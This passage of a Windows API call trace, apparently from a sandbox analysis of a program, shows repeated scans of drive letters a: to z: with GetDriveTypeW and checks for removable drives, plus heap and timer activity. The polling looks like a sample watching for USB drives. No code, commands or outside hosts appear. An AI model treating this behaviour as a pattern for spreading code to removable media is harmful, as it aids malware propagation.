(lpRootPathName="l:\\") returned 0x1 [0215.478] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.479] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.479] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.479] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.479] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.479] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.480] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.480] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.480] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.480] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.480] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.480] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.481] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.481] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.481] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0215.481] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0215.481] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.481] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0215.481] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.481] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.481] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.481] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.481] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0215.481] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.481] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.481] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.482] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.482] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0215.482] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0215.482] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.482] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325de0 [0215.482] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.482] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0215.482] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.482] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325de0 | out: hHeap=0x12c0000) returned 1 [0215.482] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.482] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0215.482] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0215.482] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.482] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0215.482] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.482] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318cc0 | out: hHeap=0x12c0000) returned 1 [0215.482] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.482] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.482] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.482] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.482] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.482] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0215.482] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.482] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.483] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.483] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0215.483] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0215.483] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.483] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0215.483] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0215.483] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.483] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0215.483] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.483] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0215.483] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.483] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.483] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0215.483] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0215.483] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.483] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0215.483] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.483] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0215.483] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.483] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.483] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0215.483] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0215.483] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.483] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.484] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.484] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.484] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.484] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.484] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.484] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.485] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.485] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.485] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.485] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.485] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.485] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.486] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.486] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.486] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.486] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.487] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.487] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.496] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.496] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.496] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.496] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.497] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.497] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.498] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.498] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.499] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.499] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0215.499] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.499] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.499] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0215.499] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.499] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.499] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.499] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0215.499] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.499] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.499] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.499] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0215.499] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0215.499] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0215.499] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0215.500] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0215.500] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.500] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0215.500] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.500] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0215.500] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325de0 [0215.500] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0215.500] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.500] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.500] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0215.500] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325de0 | out: hHeap=0x12c0000) returned 1 [0215.500] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0215.500] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0215.501] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e100 [0215.501] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.501] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e100 | out: hHeap=0x12c0000) returned 1 [0215.501] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.501] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.501] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.501] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.501] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.501] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.501] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.501] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.501] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.501] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.501] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.501] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0215.501] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0215.501] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.501] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0215.501] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.501] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.501] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.502] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.502] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0215.502] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d98 [0215.502] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.502] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0215.502] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.502] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.502] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0215.502] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.502] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0215.502] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0215.502] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.502] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0215.502] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0215.502] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0215.502] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.502] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.503] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.503] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.503] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.503] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.503] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.504] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.504] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.504] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.504] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.504] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.505] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.505] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.505] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.505] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.505] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.506] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.506] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.506] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.506] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.506] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.507] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.507] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.507] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.507] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.508] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.513] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0215.513] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0215.513] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.513] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.513] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.513] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0215.513] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0215.513] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.513] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0215.513] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.513] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0215.513] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.513] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.514] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0215.514] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.514] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0215.514] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325dc0 [0215.514] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.514] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.514] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.514] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325dc0 | out: hHeap=0x12c0000) returned 1 [0215.514] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0215.514] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0215.514] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e280 [0215.514] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.514] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e280 | out: hHeap=0x12c0000) returned 1 [0215.514] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.514] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d98 | out: hHeap=0x12c0000) returned 1 [0215.514] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.514] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.514] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0215.515] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.515] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.515] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0215.515] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0215.515] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.515] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.515] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0215.515] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0215.515] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.515] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0215.515] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.515] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.515] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.515] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.515] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0215.515] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.515] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.515] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.515] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.515] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.516] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0215.516] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.516] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.516] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0215.516] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.516] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0215.516] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0215.516] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec40 [0215.516] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.516] 